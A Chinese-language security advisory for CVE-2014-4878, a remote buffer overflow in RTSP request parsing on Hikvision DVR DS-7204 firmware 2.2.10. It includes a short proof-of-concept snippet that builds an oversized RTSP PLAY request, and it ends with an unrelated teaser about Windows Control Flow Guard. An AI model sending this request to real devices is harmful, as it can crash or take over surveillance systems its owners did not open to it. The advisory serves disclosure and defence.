发表日期:2014-12-05 10:09:52
Hikvision DVR DS-7204远程缓冲区溢出漏洞(CVE-2014-4878)
BugTraq-ID:71302
CVE-ID:CVE-2014-4878
发布日期:2014-11-24
更新日期:2014-11-27
受影响系统:
hikvision DVR DS-7204 2.2.10
详细信息:
Hikvision DVR DS-7204是硬盘录像机产品。 Hikvision DVR DS-7204(固件版本2.2.10)在RTSP请求主体解析代码的实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在受影响设备上下文中执行任意代码。
来源:
Mark Schloesser
测试方法:
警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!request = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST request += "CSeq: 7\r\n" request += "Authorization: Basic AAAAAAA\r\n" request += "Content-length: 3200\r\n\r\n" request += "A"*3200
解决办法:
厂商补丁:
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.hikvision.com/en/products_show.asp?id=506
文章来源: LemonSec概述控制流保护(CFG)是微软在Windows 8.1 update 3和Windows 10中启用的一种抵御内存泄露攻击的新机制,用于阻止针对可执行文件间接调用的恶意利用。研究人员在分析CVE-2021-26411漏洞样…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论